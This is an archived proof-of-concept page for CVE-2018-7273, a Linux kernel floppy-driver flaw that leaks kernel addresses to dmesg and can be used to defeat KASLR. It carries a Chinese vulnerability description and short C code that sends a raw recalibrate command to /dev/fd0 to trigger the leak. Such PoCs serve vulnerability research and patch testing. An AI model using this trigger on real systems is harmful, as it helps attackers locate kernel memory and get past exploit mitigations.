CVE-2018-7273 PoC — Linux kernel 安全漏洞

Source

https://github.com/jedai47/CVE-2018-7273

Associated Vulnerability

Title:Linux kernel 安全漏洞 (CVE-2018-7273)
Description:Linux kernel是美国Linux基金会发布的开源操作系统Linux所使用的内核。 Linux kernel 4.15.4及之前版本中存在安全漏洞，该漏洞源于floppy驱动程序使用printk调用来显示内存函数和全局变量的地址。攻击者可利用该漏洞读取dmesg中的信息，并使用该地址获取内核代码和数据的位置，绕过安全保护（例如：KASLR）。

Readme

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <linux/kernel.h>
#include <string.h>
#include <sys/mman.h>
#include <linux/fd.h>

static int drive_selector(int head) {
            return (head << 2);
}

void fd_recalibrate(int fd) {
                struct floppy_raw_cmd raw_cmd;
                int tmp;

                raw_cmd.flags = FD_RAW_INTR;
                raw_cmd.cmd_count = 2;

                // set up the command
                raw_cmd.cmd[raw_cmd.cmd_count++] = 0x07; 
                raw_cmd.cmd[raw_cmd.cmd_count++] = drive_selector(0); 
                tmp = ioctl( fd, FDRAWCMD, &raw_cmd ); 
                printf("Status:%d\n",tmp); 
} 
int main(){ 
        printf("Start\n"); 
        char *d; 
        struct floppy_raw_cmd *cmd; 
         
        int fd; 
        fd = open("/dev/fd0",O_RDWR | O_NDELAY); 
        fd_recalibrate(fd); 
        close(fd); 
        printf("End\n"); 
        return 0; 
}

File Snapshot


 [4.0K]  /data/pocs/9089e7553d56626b3265a2b741925491b0cbb6f5
└── [1014]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!